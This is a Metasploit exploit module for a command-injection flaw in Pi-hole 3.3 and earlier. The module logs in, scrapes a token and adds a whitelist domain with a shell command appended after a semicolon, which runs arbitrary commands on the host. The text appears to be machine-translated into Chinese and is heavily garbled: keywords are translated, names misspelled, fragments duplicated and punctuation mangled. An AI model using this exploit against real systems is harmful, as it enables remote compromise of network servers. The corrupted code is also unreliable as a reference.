#此模块需要Metasploit:https://metasploit.com/download#当前源:https://github.com/rapid7/metasploit-framework##class MetasploitModule<;msf::Explit::Remote Rank=卓越排名包括msf::Explit::Remote::HttpClient include msf::Explore::CmdStager def Initialize(INFO={})SUPER(UPDATE_INFO(INFO,';NAME';=>;=&39;PI-Hole White elist OS命令执行。说明';=>;%q{这利用了PI-Hole<;=3.3中的命令执行漏洞。将新域添加到白名单时,可以将命令链接到操作系统上运行的域。},';=&>msf_license,';作者';=&>[';h00die&39;,#msf模块';Denis Andzakovic';#Original PoC,Discovery],';参考';=&>;[[';url';,';https://pulsesecurity.co.nz/advisories/pihole-v3.3-vulns';]],';Platform';=&>;[';=&>;[';=&>;Linux';],';特权';=>;false,';Arch';=>;[ARCH_X86,ARCH_X64,ARCH_CMD],';目标';=&>;[[';自动目标';,{}]],';DisclosureDate。2018年4月15日,#39;,&39;DefaultTarget';=>;0,';备注';=>;{';稳定性';=>;[CRASH_SAFE],';副作用';=>;[工件_on_disk],';可靠性';=>;[REPEATABLE_SESSION]}))REGISTER_OPTIONS([opt::rport(80),OptString.new(';TARGETURI';,[true,';PI-Hole网站的URI';,';/';]),OptString.new(';Password&39;,[false,';Password for PI-Hole interface';,';]),])end def login(Cookie)vprint_status(';需要登录,正在尝试登录。';)send_request_cgi(';uri';=>;Normize_uri(target_uri.path;admin&39;,';settings.php&39;),';cookie';=>;cookie,';vars_get。tab';=&>;阻止列表';},';vars_post';=&>;{';pw';=&>;数据存储[';密码';]},';方法';=&>39;';)end def EXECUTE_COMMAND(cmd,_opts={})#get cookie res=send。URI';=>;Normalize_uri(target_uri.path;admin';,';index.php';))cookie=res.get_cookies print_status(";using cookie:#{cookie}&34;)#get Token res=send_request_cgi(';uri';=&>;Normalize_uri(target_uri.path,";)#get Token res=send_request_cgi(';uri';=&>;Normize_uri(target_uri.path,&。list.php';),';cookie';=>;cookie,';vars_get';=>;{';l';=>;';白色';})#如果res&;&;res.body.include?(';登录以开始您的会话';)res=login(Cookie)结束,我们是否收到登录提示。res.body.include?(';登录以启动您的会话';)FAIL_WITH(失败::错误配置,';密码不正确)结束#<;div id=";Token";hidden>;f5al5pNfFj9YOCSdX159tXjttdHUOAuxOJDgwcgnUHs=<;/div>;#还可能包括/%r{div id=";Token";hidden>;(?<;token>;[\w+=/]+)<;/div>;}=~res.body除非令牌FAIL_WITH(FAILURE::UnexpectedReply,';无法找到令牌';)End Print_Status(";使用令牌:#{Token}";)SEND_REQUEST_CGI({';method';=&>;';POST';,';CTYPE';=>;=';application/x-www-form-urlencode。=&>cookie,';uri';=>;Normize_uri(target_uri.path,';admin&39;,';script';,';pi-hole';,';php';,';add.php';),';vars_post';=>;{';domain'。#{rand_text_alphanumeric(3..5)}.com;#{cmd}";,';List';=&>;白色';,';Token';=>;Token}})结束定义检查BEGIN RES=SEND_REQUEST_cgi(';uri';=&>;Normize_uri(target_uri.path,';admin';,';index.php';index.php';),';方法';=&>;获取';)FAIL_WITH(FAILURE::UnexpectedReply,";#{Peer}-无法连接到Web服务-没有响应";)如果res.nil?FAIL_WITH(FAILURE::UnexpectedReply,";#{Peer}-检查URI路径,意外的HTTP响应代码:#{res.code}";)if res.code!=200#vDev(head,v3.2.1-0-g31dd8-脏)#v3.2.1%r{<;b>;Web界面版本\s*<;/b>;\s*(vDev\(head,)?v?[\d\.]+)\)?.*<;b>;}m=~res.body if version&;&;Gem::Version.new(Version)<;Gem::Version.new(';3.3';)vprint_Good(";检测到的版本:#{Version}";)return CheckCode::显示其他vprint_BAD(";检测到的版本:#{Version}"。)返回CheckCode::Safe End救援::Rex::ConnectionError FAIL_WITH(Failure::Unreacable,";#{Peer}-无法连接到Web服务";)End CheckCode::Safe End Def Exit If CheckCode::Fail_With(Failure::NotVulnerable,';Target is not Vulnerable';)END BEGIN EXECUTE_cmdstager(风味::Bourne。#{Peer}-无法连接到Web服务";)结束端结束